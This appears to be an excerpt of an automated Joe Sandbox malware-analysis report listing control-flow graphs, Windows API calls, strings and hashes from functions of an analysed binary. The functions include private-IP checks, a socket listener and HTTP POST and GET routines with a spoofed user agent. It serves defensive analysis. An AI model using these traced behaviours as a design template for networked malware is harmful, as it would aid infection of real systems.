                                                                                                                                                                                                                                                    control_flow_graph 460 40aea0-40aeb7 call 40add0 463 40aeb9 460->463 464 40aebe-40aeda call 40aa20 strcmp 460->464 465 40b145-40b148 463->465 468 40aee1-40aefd call 40aa20 strstr 464->468 469 40aedc 464->469 472 40af40-40af5c call 40aa20 strstr 468->472 473 40aeff-40af1b call 40aa20 strstr 468->473 469->465 480 40af5e-40af7a call 40aa20 strstr 472->480 481 40af9f-40afbb call 40aa20 strstr 472->481 478 40af3b 473->478 479 40af1d-40af39 call 40aa20 strstr 473->479 478->465 479->472 479->478 488 40af9a 480->488 489 40af7c-40af98 call 40aa20 strstr 480->489 490 40afbd-40afd9 call 40aa20 strstr 481->490 491 40affe-40b014 EnterCriticalSection 481->491 488->465 489->481 489->488 502 40aff9 490->502 503 40afdb-40aff7 call 40aa20 strstr 490->503 492 40b01f-40b028 491->492 495 40b059-40b064 call 40b150 492->495 496 40b02a-40b03a 492->496 509 40b13a-40b13f LeaveCriticalSection 495->509 510 40b06a-40b078 495->510 499 40b057 496->499 500 40b03c-40b055 call 40d4a0 496->500 499->492 500->495 502->465 503->491 503->502 509->465 512 40b07a 510->512 513 40b07e-40b08f call 409d90 510->513 512->513 513->509 516 40b095-40b0b2 call 40d4a0 513->516 519 40b0b4-40b0c4 516->519 520 40b10a-40b122 516->520 521 40b0d0-40b108 call 40a1b0 519->521 522 40b0c6-40b0ce Sleep 519->522 523 40b128-40b133 call 40b150 520->523 521->523 522->519 523->509 528 40b135 call 40ab80 523->528 528->509
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                                                                                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                                                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 530 401920-401947 GetTickCount WaitForSingleObject 531 401ac9-401acf 530->531 532 40194d-401964 WSAWaitForMultipleEvents 530->532 533 4019f0-401a03 GetTickCount 532->533 534 40196a-401981 WSAEnumNetworkEvents 532->534 535 401a43-401a4c GetTickCount 533->535 536 401a05-401a14 EnterCriticalSection 533->536 534->533 537 401983-401988 534->537 538 401ab5-401ac3 WaitForSingleObject 535->538 539 401a4e-401a5d EnterCriticalSection 535->539 540 401a16-401a1d 536->540 541 401a3a-401a41 LeaveCriticalSection 536->541 537->533 542 40198a-401990 537->542 538->531 538->532 543 401aa1-401ab1 LeaveCriticalSection GetTickCount 539->543 544 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 539->544 545 401a35 call 401820 540->545 546 401a1f-401a27 540->546 541->538 542->533 547 401992-4019b1 accept 542->547 543->538 555 401a97-401a9f 544->555 556 401a79-401a82 544->556 545->541 546->540 549 401a29-401a30 LeaveCriticalSection 546->549 547->533 551 4019b3-4019c2 call 4022c0 547->551 549->538 551->533 557 4019c4-4019df call 401740 551->557 555->543 555->544 556->555 558 401a84-401a8d call 40ab40 556->558 557->533 563 4019e1-4019e7 557->563 558->555 563->533 564 4019e9-4019eb call 401cf0 563->564 564->533
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci$.ou
                                                                                                                                                                                                                                                    • API String ID: 2403999931-3537421359
                                                                                                                                                                                                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                                                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 679 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 680 40dc61-40dc94 InternetConnectA 679->680 681 40ddd7-40dde0 679->681 682 40ddca-40ddd1 InternetCloseHandle 680->682 683 40dc9a-40dcca HttpOpenRequestA 680->683 682->681 684 40dcd0-40dce7 HttpSendRequestA 683->684 685 40ddbd-40ddc4 InternetCloseHandle 683->685 686 40ddb0-40ddb7 InternetCloseHandle 684->686 687 40dced-40dcf1 684->687 685->682 686->685 688 40dda6 687->688 689 40dcf7 687->689 688->686 690 40dd01-40dd08 689->690 691 40dd99-40dda4 690->691 692 40dd0e-40dd30 InternetReadFile 690->692 691->686 693 40dd32-40dd39 692->693 694 40dd3b 692->694 693->694 695 40dd3d-40dd94 call 409fe0 memcpy 693->695 694->691 695->690
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                                                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3902698870-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                                                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                    • String ID: Vz@$.ou
                                                                                                                                                                                                                                                    • API String ID: 439099756-1244017076
                                                                                                                                                                                                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                                                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                                                                                                                                                                                                    APIs
